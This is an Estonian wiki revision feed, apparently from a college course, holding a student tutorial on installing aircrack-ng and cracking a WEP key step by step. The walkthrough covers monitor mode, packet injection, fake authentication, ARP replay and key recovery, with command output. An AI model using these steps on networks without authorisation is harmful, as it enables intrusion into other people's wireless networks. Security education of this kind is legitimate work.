Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89310</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89310"/>
		<updated>2015-05-25T19:34:38Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Eesmärk */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
